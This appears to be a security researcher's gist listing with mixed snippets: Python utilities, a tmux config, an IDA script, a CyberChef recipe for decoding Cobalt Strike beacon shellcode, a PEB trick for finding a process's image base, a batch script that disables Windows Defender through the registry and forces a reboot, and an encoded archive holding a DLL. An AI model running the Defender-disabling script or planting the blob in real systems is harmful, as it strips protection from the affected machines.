plowsec / py_cheatsheet.py
Last active February 2, 2023 14:57
Useful python snippets
# dataclass with dict
from dataclasses import dataclass, field
@dataclass
class Stuff:
    """Example record showing how a dataclass gets a per-instance mutable default.

    Attributes:
        a: integer payload.
        b: string payload.
        MyDict: dict that starts empty for every new instance. It is built by a
            factory because ``dataclass`` rejects a literal ``{}`` default
            (ValueError: mutable default) -- exactly to stop one dict object
            from being shared between all instances.
    """

    a: int
    b: str
    # The lambda is equivalent to ``default_factory=dict``: a fresh dict per instance.
    MyDict: dict = field(default_factory=lambda: {})
plowsec / 0_CyberChef_CobaltStrike_Shellcode_Decoder_Recipe
Created February 25, 2021 09:38 — forked from 0xtornado/0_CyberChef_CobaltStrike_Shellcode_Decoder_Recipe
CyberChef recipe to extract and decode the shellcode embedded in a Cobalt Strike PowerShell beacon loader. The recipe branches on the presence of `bxor`: it base64-decodes the UTF-16LE script, pulls out the inner base64 blob and gunzips it, then base64-decodes the shellcode and XORs it with the key hard-coded in the recipe (decimal 35, i.e. 0x23) — change that value if a sample uses a different key.
[{"op":"Conditional Jump","args":["bxor",false,"Decode_Shellcode",10]},{"op":"Label","args":["Decode_beacon"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Decode text","args":["UTF-16LE (1200)"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Gunzip","args":[]},{"op":"Label","args":["Decode_Shellcode"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"Conditional Jump","args":["",false,"",10]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"XOR","args":[{"option":"Decimal","string":"35"},"Standard",false]}]
@ECHO OFF
REM Elevation check: NET SESSION only succeeds from an administrator shell,
REM so errorLevel 0 below means "running elevated".
NET SESSION >nul 2>&1
if %errorLevel% == 0 (
    REM Writes the Group Policy value that switches Windows Defender off; the
    REM change only applies after a reboot, hence the forced restart below.
    REM NOTE -review-: current Windows 10/11 builds ignore DisableAntiSpyware
    REM while Tamper Protection is on -- confirm against the target build.
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /V DisableAntiSpyware /T REG_DWORD /D 1 /F
    ECHO [+] Restart required in order to apply modification.
    REM SET /P reads a whole line, so this actually waits for Enter, not for any key.
    SET /P temp="[?] Press a key to reboot"
    REM Reboot now: /R restart, /F close running programs without warning, /T 0 no delay.
    SHUTDOWN /R /F /T 0
) else (
    REM Non-elevated branch; its body and the closing parenthesis are not shown in this excerpt.
UEsDBBQACQAIAFKJMVOwiYbLqycEAABOBAAIABwAc2Vucy5kbGxVVAkAA+uvRGFPuGFhdXgLAAEE9QEAAAQUAAAAQNm5ETRIyZwTaUfocRePj+wzhsQJRc0YB+VlJ9JCvC5EMkeMWADNWUdRmtibDFVCKJTWYjEF+babobN+l+d0t3MQfmEcfCNgLWBkdhKmLFDKQCGB3XoIMbdWhQTCwG/NY3XX23AsMVZqPDvRVVSYWUI0HheuTIif6mSFGUcgJFpYUVCOsnHCktkAbhUfcwrVBe0WnMw2+VNN5HsAv7cKSDQq+vVzUM0ugScfAj6vzhtL0qrts+M7KFqwH/zP/99xaOqJLgWwAHaezwIaKIX3ZDUdEG3j//RPtbIgsQSP3TscloOWj+kdTHbnuVxLB5bvPuYdi8e2lPPQSGXmaaUpM4Ae1oTPDSy1V24huUh5SWdUuidteR2MUlYcjUQ9rBS1/0IlHM05Ap6pjbB06QGdDDRuvFVKisZIfQSFTeUZY9PM6+9zFoGRtWI8+JzQJE5gEM0Z67xMDkF/irNcN9kkrc8q9w4inQ1/dunw7NacpNmgyy0/JTP2fw9idrkKyTBNrYhiJZwRVVMnxe6miqpfp2+SyzPw/k+awThAekGbZFnCWSUd9TI23tlbRINaysQDH+/apdXeWhoATp7GWEVdl/3Cd3FsMbsGN60OSZt+ZY30HA9KVPpaKI5eBjfEP9cYB+elYE09XwbwphDWcHTPSnCjU+H2qDb2KsA1K1aLK2568tbPx+PKal6eVL5q7RbvtDj94vXBCmouMHB8UhXzMNpg61KwZKog928JJO0mpAq1j8QcKlj9CCH2BWbbf0sTjrgC5BUXwMu6ZLtMnzCZFx2S/+HB7LTq43NJqKJaAINgkBv7/2YvGpSXZiSUh/wlmj9sb9nf3KEcRhX98z2mqajZXOC5SH1O6c5iyIloHXdySG6OrPaO/75WQdq9ORJdtrOBqImZRSEdIZ5KNgzorjjicay7/j0ZQ6snLeO7
plowsec / getmodulehandle.md
Created January 27, 2022 14:18
Get own module base address without GetModuleHandle

Get the current process's image base address by reading it from the PEB, without calling GetModuleHandle

// Reach the PEB through the TEB instead of calling GetModuleHandle(NULL): on x64 the
// PEB pointer is at TEB+0x60, read via the gs segment. On x86 it is at TEB+0x30 via fs,
// so a 32-bit build needs __readfsdword(0x30), not just a different offset here.
_PEB* peb = (_PEB*)__readgsqword(0x60); // 0x30 for x86
// The process's own image base as recorded in the PEB. Assumes the _PEB definition in
// scope names this field lpImageBaseAddress; the PEB in winternl.h only exposes it as
// Reserved3[1] -- TODO confirm against the struct definition actually used.
LPVOID ImageBase2 = (LPVOID)peb->lpImageBaseAddress;
// Reference value obtained through the documented API, for comparison.
LPVOID ImageBase = (LPVOID)GetModuleHandleA(NULL);
// Expected to print the same address twice.
std::cout << "Image base 1 vs 2 : " << std::hex << ImageBase << " " << ImageBase2 << std::endl;
plowsec / .tmux.conf
Created March 13, 2022 12:01
.tmux.conf
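# Mouse support: click to select panes and windows, drag to resize, wheel to scroll.
set -g mouse on
# mouse-select-pane and mouse-select-window were removed in tmux 2.1 (their behaviour
# is covered by "mouse on" above); tmux >= 2.1 rejects them with "unknown option" and
# reports a config error at startup, so they are kept only as a comment.
# set -g mouse-select-pane on
# set -g mouse-select-window on
# Scrollback lines kept per pane. This is ~100 million, so long-lived busy panes can
# hold a lot of memory -- lower it if the tmux server's RSS becomes a problem.
set -g history-limit 100000000
# Milliseconds a repeatable key binding stays active after it fires.
set-option -g repeat-time 50
# Advertise 256 colours to programs running inside tmux.
set -g default-terminal "screen-256color"
# Delay after Esc before tmux decides it is not the start of a key sequence (server
# option; 0 makes Esc immediate in vim and friends). The original file assigned this
# twice, 10 and then 0; only the last assignment takes effect, so the redundant one is gone.
set -sg escape-time 0
# How long the pane numbers stay on screen after prefix-q, in milliseconds.
set -g display-panes-time 5000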
plowsec / systemd_dependencies_printer.py
Created June 30, 2022 14:07
Quick and dirty script to display systemd services as a directed graph
import networkx as nx
import sys
import os
import logging
import configparser
import traceback
from typing import List
from collections import OrderedDict
# Module-level side effect: configures the root logger at DEBUG as soon as this file is imported or run.
logging.basicConfig(level=logging.DEBUG)
plowsec / ida_get_all_functions.idc
Created July 21, 2022 12:40
Get all the functions addresses and names from an IDB
// Print "start = <address> name = <name>" for every function in the IDB, in address order.
// NextFunction(ea) returns the first function starting after ea, so the walk begins at
// address 0 and ends when it yields BADADDR.
// NOTE(review): check that %08x shows the full address on 64-bit IDBs; IDC's %a formats
// an ea_t directly if it does not.
auto cur;
for (cur = NextFunction(0); cur != BADADDR; cur = NextFunction(cur))
    Message("start = 0x%08x name = %s\n", cur, GetFunctionName(cur));
plowsec / logutils.py
Created December 16, 2022 09:49
logging with colors and tqdm progress bar + pickle + ctrl-c handler
import json
import sys
import os
import logging
import argparse
import time
import requests
import re
from urllib.parse import urlparse
plowsec / upload.py
Last active February 1, 2023 15:46
Simple Python3 HTTP server to upload files + HTML upload page. It relies on the `cgi` module, which is deprecated since Python 3.11 and removed in 3.13, so it needs an older interpreter or a replacement for the multipart parsing.
import os
import http.server, http, cgi
import re
from io import BytesIO
import logging
import pathlib
import tempfile
# Log line layout: timestamp | level | [file:line] function() | message.
fmt = '%(asctime)s | %(levelname)8s | [%(filename)s:%(lineno)3d] %(funcName)s() | %(message)s'
# Module logger; where `fmt` is attached to a handler is not visible in this excerpt.
logger = logging.getLogger(__name__)